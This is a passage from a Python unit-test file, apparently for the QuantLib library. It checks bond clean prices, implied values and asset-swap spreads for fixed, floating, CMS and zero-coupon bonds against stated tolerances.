[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondImpliedValue2 = floatingBond2.cleanPrice()
floatingBondSettlementDate2= floatingBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
floatingBondCleanPrice2 = cleanPriceFromZSpread(
floatingBond2, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual,
fixedBondSettlementDate1)
error7 = abs(floatingBondImpliedValue2-floatingBondCleanPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue2)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
#### CMS bond (Isin: XS0228052402 CRDIT 0 8/22/20)
#### maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondImpliedValue1 = cmsBond1.cleanPrice()
cmsBondSettlementDate1= cmsBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
cmsBondCleanPrice1 = cleanPriceFromZSpread(
cmsBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
cmsBondSettlementDate1)
error9 = abs(cmsBondImpliedValue1-cmsBondCleanPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue1)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
## CMS bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondImpliedValue2 = cmsBond2.cleanPrice()
cmsBondSettlementDate2= cmsBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
cmsBondCleanPrice2 = cleanPriceFromZSpread(
cmsBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
cmsBondSettlementDate2)
error11 = abs(cmsBondImpliedValue2-cmsBondCleanPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue2)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
## Zero-Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue1 = zeroCpnBond1.cleanPrice()
zeroCpnBondSettlementDate1= zeroCpnBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice1 = cleanPriceFromZSpread(zeroCpnBond1,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate1)
error13 = abs(zeroCpnBondImpliedValue1-zeroCpnBondCleanPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue1)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity doesn't occur on a business day
zeroCpnBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue2 = zeroCpnBond2.cleanPrice()
zeroCpnBondSettlementDate2= zeroCpnBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice2 = cleanPriceFromZSpread(zeroCpnBond2,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate2)
error15 = abs(zeroCpnBondImpliedValue2-zeroCpnBondCleanPrice2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue2)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
def testGenericBondImplied(self):
"""Testing implied generic-bond value against asset-swap fair price with null spread..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1,
ActualActual(ActualActual.ISDA),
[self.faceAmount],
[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1,
Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
tuple(fixedBondLeg1))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure,True)
fixedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedBondPrice1)
self.assertFalse(error1>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice1)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2,Thirty360(Thirty360.BondBasis),
[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2,Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, tuple(fixedBondLeg2))
fixedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
error2 = abs(fixedBondAssetSwapPrice2-fixedBondPrice2)
self.assertFalse(error2>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice2)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),ModifiedFollowing, [fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
tuple(floatingBondLeg1))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap (payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
error3 = abs(floatingBondAssetSwapPrice1-floatingBondPrice1)
self.assertFalse(error3>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice1)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 =Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays],[],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
tuple(floatingBondLeg2))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
currentCoupon=0.04013+0.0025
floatingCurrentCoupon= floatingBond2.nextCouponRate()
error4= abs(floatingCurrentCoupon-currentCoupon)
self.assertFalse(error4>tolerance,
"wrong current coupon is returned for floater bond:"
+ "\n bond's calculated current coupon: " + str(currentCoupon)
+ "\n current coupon asked to the bond: " + str(floatingCurrentCoupon)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice2-floatingBondPrice2)
self.assertFalse(error5>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice2)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice2)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[0.055],[0.025],[],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, tuple(cmsBondLeg1))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
error6 = abs(cmsBondAssetSwapPrice1-cmsBondPrice1)
self.assertFalse(error6>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice1)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, tuple(cmsBondLeg2))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
error7 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error7>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice2)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnAssetSwap1 = AssetSwap (payFixedRate,
zeroCpnBond1, zeroCpnBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnAssetSwap1.fairCleanPrice()
error8 = abs(zeroCpnBondAssetSwapPrice1-zeroCpnBondPrice1)
self.assertFalse(error8>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice1)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnBond2, zeroCpnBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnAssetSwap2.fairCleanPrice()
error9 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error9>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice2)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
def testMASWWithGenericBond(self):
"""Testing market asset swap against par asset swap with generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
mktAssetSwap = False
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1, ActualActual(ActualActual.ISDA), [self.faceAmount], [0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondMktPrice1 = 89.22 ## market price observed on 7th June 2007
fixedBondMktFullPrice1=fixedBondMktPrice1+fixedBond1.accruedAmount()
fixedBondParAssetSwap1 = AssetSwap (payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap1.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread1 = fixedBondParAssetSwap1.fairSpread()
fixedBondMktAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap1.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread1 = fixedBondMktAssetSwap1.fairSpread()
tolerance = 1.0e-13
error1 = abs(fixedBondMktAssetSwapSpread1-
100*fixedBondParAssetSwapSpread1/fixedBondMktFullPrice1)
self.assertFalse(error1>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(fixedBondParAssetSwapSpread1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
fixedBondMktPrice2 = 99.98 ## market price observed on 7th June 2007
fixedBondMktFullPrice2 = fixedBondMktPrice2+fixedBond2.accruedAmount()
fixedBondParAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap2.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread2 = fixedBondParAssetSwap2.fairSpread()
fixedBondMktAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap2.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread2 = fixedBondMktAssetSwap2.fairSpread()
error2 = abs(fixedBondMktAssetSwapSpread2-
100*fixedBondParAssetSwapSpread2/fixedBondMktFullPrice2)
self.assertFalse(error2>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(fixedBondParAssetSwapSpread2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,Actual360(),Following,
[fixingDays], [],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
## market price observed on 7th June 2007
floatingBondMktPrice1 = 101.64
floatingBondMktFullPrice1 = floatingBondMktPrice1+floatingBond1.accruedAmount()
floatingBondParAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap1.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread1 = floatingBondParAssetSwap1.fairSpread()
floatingBondMktAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap1.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread1 = floatingBondMktAssetSwap1.fairSpread()
error3 = abs(floatingBondMktAssetSwapSpread1-
100*floatingBondParAssetSwapSpread1/floatingBondMktFullPrice1)
self.assertFalse(error3>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market asset swap spread: " + str(floatingBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(floatingBondParAssetSwapSpread1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex, Actual360(),
ModifiedFollowing, [fixingDays], [], [0.0025] , [],[], inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
## market price observed on 7th June 2007
floatingBondMktPrice2 = 101.248
floatingBondMktFullPrice2 = floatingBondMktPrice2+floatingBond2.accruedAmount()
floatingBondParAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap2.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread2 = floatingBondParAssetSwap2.fairSpread()
floatingBondMktAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap2.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread2 = floatingBondMktAssetSwap2.fairSpread()
error4 = abs(floatingBondMktAssetSwapSpread2-
100*floatingBondParAssetSwapSpread2/floatingBondMktFullPrice2)
self.assertFalse(error4>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market asset swap spread: " + str(floatingBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(floatingBondParAssetSwapSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondMktPrice1 = 88.45 ## market price observed on 7th June 2007
cmsBondMktFullPrice1 = cmsBondMktPrice1+cmsBond1.accruedAmount()
cmsBondParAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap1.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread1 = cmsBondParAssetSwap1.fairSpread()
cmsBondMktAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap1.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread1 = cmsBondMktAssetSwap1.fairSpread()
error5 = abs(cmsBondMktAssetSwapSpread1-
